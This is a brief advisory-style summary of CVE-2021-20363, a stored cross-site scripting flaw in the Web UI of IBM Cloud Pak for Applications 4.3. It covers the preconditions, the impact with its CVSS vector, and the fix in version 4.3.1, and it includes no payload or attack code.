CVE-2021-20363

Vulnerability

IBM Cloud Pak for Applications version 4.3 is vulnerable to cross-site scripting (XSS) in its Web UI. The vulnerability allows users with low privileges to embed arbitrary JavaScript code, which is then executed in the context of other users' sessions. This affects all deployments of version 4.3 as per the advisory [1].

Exploitation

An attacker must have a valid low-privileged account on the IBM Cloud Pak for Applications instance. The attacker can inject malicious JavaScript into a field or input that is later rendered in the Web UI. When another user (including a privileged user) views the affected page, the injected script executes. User interaction (e.g., clicking a link) is required for the script to run in the victim's browser [1].

Impact

Successful exploitation leads to execution of arbitrary JavaScript in the victim's browser within the trusted session. This can result in disclosure of sensitive information, including credentials, as the script can access cookies, session tokens, or perform actions on behalf of the victim. The CVSS vector indicates low confidentiality and integrity impact, with scope change (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) [1].

Mitigation

IBM released version 4.3.1 which fixes the vulnerability by sanitizing user input to prevent JavaScript injection. Users should upgrade to IBM Cloud Pak for Applications 4.3.1 or later. No workarounds are available [1].